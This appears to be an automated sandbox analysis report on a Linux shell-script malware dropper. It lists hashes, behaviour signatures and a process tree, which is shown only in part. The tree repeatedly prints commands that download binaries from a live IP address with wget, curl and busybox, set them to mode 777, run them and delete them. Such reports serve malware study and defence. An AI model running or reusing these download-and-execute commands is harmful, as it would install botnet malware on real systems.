Analysis
-
max time kernel
15s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28/10/2024, 02:12
Static task
static1
Behavioral task
behavioral1
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
-
Size
10KB
-
MD5
d8b3cb4793886f8ba51c73bc3cadbaca
-
SHA1
2a4c460dad61345bdd09351812e2865159abe9dd
-
SHA256
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31
-
SHA512
dac5943a6be21fdaf966f6845585dedf0d97cbfa7743cd046fe3570f9ed3a292545364c7f491984555e1e5c5093f3ed46570d03629c6f6786b735a294788e013
-
SSDEEP
192:rmjDQXL2FkYrQo5MENdKVRKKmdNdKVR2kYrQoYjDQXLoN:UFkYrQo5MAKmbkYrQo6
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1565 chmod 1607 chmod 1523 chmod 1541 chmod 1631 chmod 1535 chmod 1547 chmod 1613 chmod 1643 chmod 1655 chmod 1504 chmod 1516 chmod 1577 chmod 1601 chmod 1571 chmod 1583 chmod 1529 chmod 1559 chmod 1619 chmod 1625 chmod 1637 chmod 1667 chmod 1510 chmod 1553 chmod 1589 chmod 1595 chmod 1649 chmod 1661 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv 1505 LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv /tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB 1511 x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB /tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM 1517 jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM /tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj 1524 mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj /tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6 1530 kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6 /tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy 1536 ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy /tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b 1542 CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b /tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI 1548 HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI /tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY 1554 dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY /tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9 1560 Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9 /tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ 1566 ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ /tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0 1572 yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0 /tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX 1578 ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX /tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr 1584 vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr /tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6 1590 kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6 /tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj 1596 mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj /tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY 1602 dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY /tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy 1608 ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy /tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b 1614 CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b /tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI 1620 HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI /tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX 1626 ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX /tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr 1632 vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr /tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9 1638 Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9 /tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ 1644 ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ /tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0 1650 yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0 /tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM 1656 jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM /tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv 1662 LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv /tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB 1668 x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj curl File opened for modification /tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy curl File opened for modification /tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX curl File opened for modification /tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv curl File opened for modification /tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b curl File opened for modification /tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9 curl File opened for modification /tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy curl File opened for modification /tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0 curl File opened for modification /tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv curl File opened for modification /tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY curl File opened for modification /tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX curl File opened for modification /tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr curl File opened for modification /tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ curl File opened for modification /tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB curl File opened for modification /tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b curl File opened for modification /tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ curl File opened for modification /tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0 curl File opened for modification /tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6 curl File opened for modification /tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY curl File opened for modification /tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI curl File opened for modification /tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9 curl File opened for modification /tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj curl File opened for modification /tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr curl File opened for modification /tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM curl File opened for modification /tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM curl File opened for modification /tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6 curl File opened for modification /tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI curl File opened for modification /tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB curl
Processes
-
/tmp/1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh/tmp/1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh1⤵PID:1490
-
/bin/rm/bin/rm bins.sh2⤵PID:1497
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:1498
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Writes file to tmp directory
PID:1499
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:1503
-
-
/bin/chmodchmod 777 LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- File and Directory Permissions Modification
PID:1504
-
-
/tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv./LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Executes dropped EXE
PID:1505
-
-
/bin/rmrm LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:1506
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:1507
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Writes file to tmp directory
PID:1508
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:1509
-
-
/bin/chmodchmod 777 x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- File and Directory Permissions Modification
PID:1510
-
-
/tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB./x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Executes dropped EXE
PID:1511
-
-
/bin/rmrm x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:1512
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:1513
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:1515
-
-
/bin/chmodchmod 777 jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- File and Directory Permissions Modification
PID:1516
-
-
/tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM./jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Executes dropped EXE
PID:1517
-
-
/bin/rmrm jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:1518
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:1519
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:1522
-
-
/bin/chmodchmod 777 mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj./mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Executes dropped EXE
PID:1524
-
-
/bin/rmrm mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:1525
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:1526
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:1528
-
-
/bin/chmodchmod 777 kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6./kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Executes dropped EXE
PID:1530
-
-
/bin/rmrm kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:1531
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:1532
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:1534
-
-
/bin/chmodchmod 777 ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy./ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:1537
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:1538
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:1540
-
-
/bin/chmodchmod 777 CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b./CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:1543
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:1546
-
-
/bin/chmodchmod 777 HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI./HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:1549
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:1550
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:1552
-
-
/bin/chmodchmod 777 dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY./dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:1555
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:1556
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:1558
-
-
/bin/chmodchmod 777 Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9./Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:1561
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:1562
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:1564
-
-
/bin/chmodchmod 777 ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ./ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:1567
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:1568
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:1570
-
-
/bin/chmodchmod 777 yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0./yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:1573
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:1574
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:1576
-
-
/bin/chmodchmod 777 ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX./ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:1579
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:1580
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:1582
-
-
/bin/chmodchmod 777 vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr./vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:1585
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:1586
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:1588
-
-
/bin/chmodchmod 777 kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6./kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:1591
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:1592
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:1594
-
-
/bin/chmodchmod 777 mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj./mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Executes dropped EXE
PID:1596
-
-
/bin/rmrm mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:1597
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:1598
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:1600
-
-
/bin/chmodchmod 777 dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY./dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:1603
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:1604
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:1606
-
-
/bin/chmodchmod 777 ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy./ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:1609
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:1610
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:1612
-
-
/bin/chmodchmod 777 CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b./CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:1615
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:1616
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:1618
-
-
/bin/chmodchmod 777 HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI./HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Executes dropped EXE
PID:1620
-
-
/bin/rmrm HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:1621
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:1622
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:1624
-
-
/bin/chmodchmod 777 ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX./ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:1627
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:1630
-
-
/bin/chmodchmod 777 vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr./vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:1633
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:1634
-
-
